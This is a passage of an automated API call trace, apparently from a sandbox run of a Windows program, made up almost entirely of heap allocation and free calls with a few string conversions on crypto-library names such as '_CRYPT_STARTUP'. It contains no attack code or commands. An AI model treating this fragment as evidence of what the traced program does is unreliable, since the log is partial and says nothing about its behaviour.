RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x3bf0050 [0147.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0147.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0147.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0147.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0147.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0147.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x2f1ada8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0147.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0147.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0147.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0147.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0147.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0147.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.708] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0147.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.708] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0147.709] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0147.709] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0147.709] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.709] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0147.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.709] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0147.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0147.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0147.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0147.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.711] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0147.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0147.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0147.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0147.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0147.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0147.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 